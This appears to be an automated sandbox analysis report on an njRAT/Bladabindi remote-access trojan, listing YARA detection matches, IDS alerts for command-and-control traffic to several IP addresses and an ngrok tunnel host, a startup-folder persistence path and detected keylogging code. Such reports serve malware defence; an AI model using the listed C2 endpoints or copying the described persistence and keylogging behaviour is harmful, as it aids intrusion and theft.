  00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp
  00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp
  0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp
Source: Yara match; File sources of type MEMORYSTR (process memory space):
  iR2UtZj5vP.exe PID: 7976
  iR2UtZj5vP.exe PID: 8100
  WindowsServices.exe PID: 7180
  WindowsServices.exe PID: 7396
  WindowsServices.exe PID: 340
  WindowsServices.exe PID: 2928
  WindowsServices.exe PID: 2292
  WindowsServices.exe PID: 2960
  WindowsServices.exe PID: 2536
  WindowsServices.exe PID: 4520
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe; Joe Sandbox ML: detected
Source: iR2UtZj5vP.exe; Joe Sandbox ML: detected
Source: iR2UtZj5vP.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\iR2UtZj5vP.exe; File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: Binary string: caspol.pdbx; source: iR2UtZj5vP.exe, 00000001.00000003.1338882973.0000000000632000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000005.00000003.1426722472.0000000000651000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 0000000E.00000002.1683943094.000000000048D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1746893356.000000000061D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000016.00000002.1869540964.000000000065D000.00000004.00000020.00020000.00000000.sdmp, iR2UtZj5vP.exe.1.dr, WindowsServices.exe.4.dr
Source: Binary string: caspol.pdb; source: iR2UtZj5vP.exe, 00000001.00000003.1338882973.0000000000632000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000005.00000003.1426722472.0000000000651000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 0000000E.00000002.1683943094.000000000048D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1746893356.000000000061D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000016.00000002.1869540964.000000000065D000.00000004.00000020.00020000.00000000.sdmp, iR2UtZj5vP.exe.1.dr, WindowsServices.exe.4.dr

Networking

Source: Traffic; Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll), one alert per connection:
  192.168.2.11:49705 -> 3.6.122.107:19208
  192.168.2.11:49706 -> 3.6.122.107:19208
  192.168.2.11:49707 -> 3.6.122.107:19208
  192.168.2.11:49708 -> 3.6.122.107:19208
  192.168.2.11:49709 -> 3.6.122.107:19208
  192.168.2.11:49711 -> 3.6.122.107:19208
  192.168.2.11:49712 -> 3.6.122.107:19208
  192.168.2.11:49713 -> 3.6.122.107:19208
  192.168.2.11:49715 -> 3.6.122.107:19208
  192.168.2.11:49716 -> 3.6.122.107:19208
  192.168.2.11:49717 -> 3.6.122.107:19208
  192.168.2.11:49718 -> 3.6.122.107:19208
  192.168.2.11:49719 -> 3.6.122.107:19208
  192.168.2.11:49720 -> 3.6.98.232:19208
  192.168.2.11:49721 -> 3.6.98.232:19208
  192.168.2.11:49722 -> 3.6.98.232:19208
  192.168.2.11:49723 -> 3.6.98.232:19208
  192.168.2.11:49724 -> 3.6.98.232:19208
  192.168.2.11:49725 -> 3.6.98.232:19208
  192.168.2.11:49726 -> 3.6.122.107:19208
  192.168.2.11:49727 -> 3.6.122.107:19208
  192.168.2.11:49728 -> 3.6.115.182:19208
Source: Malware configuration extractor; URLs: 0.tcp.in.ngrok.io
Source: global traffic; TCP traffic: 3.6.122.107 ports 0,1,2,8,9,19208
Source: global traffic; TCP traffic: 3.6.115.182 ports 0,1,2,8,9,19208
Source: global traffic; TCP traffic: 3.6.98.232 ports 0,1,2,8,9,19208
Source: global traffic; TCP traffic: 192.168.2.11:49705 -> 3.6.122.107:19208
Source: global traffic; TCP traffic: 192.168.2.11:49720 -> 3.6.98.232:19208
Source: global traffic; TCP traffic: 192.168.2.11:49728 -> 3.6.115.182:19208
Source: Joe Sandbox View; IP Address: 3.6.122.107
Source: Joe Sandbox View; IP Address: 3.6.115.182
Source: Joe Sandbox View; IP Address: 3.6.98.232
Source: Joe Sandbox View; ASN Name: AMAZON-02 (US), for each of the three IP addresses above
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (three times)
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownDNS traffic detected: queries for: 0.tcp.in.ngrok.io

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, kl.cs | .Net Code: VKCodeToUnicode
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, kl.cs | .Net Code: VKCodeToUnicode
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, kl.cs | .Net Code: VKCodeToUnicode
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, kl.cs | .Net Code: VKCodeToUnicode
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, kl.cs | .Net Code: VKCodeToUnicode

        E-Banking Fraud

        Source: Yara match | File source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: iR2UtZj5vP.exe PID: 7976, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: iR2UtZj5vP.exe PID: 8100, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: WindowsServices.exe PID: 7180, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: WindowsServices.exe PID: 7396, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: WindowsServices.exe PID: 340, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: WindowsServices.exe PID: 2928, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: WindowsServices.exe PID: 2292, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: WindowsServices.exe PID: 2960, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: WindowsServices.exe PID: 2536, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: WindowsServices.exe PID: 4520, type: MEMORYSTR

        Operating System Destruction

        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Process information set: 01 00 00 00

        System Summary

        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPE | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
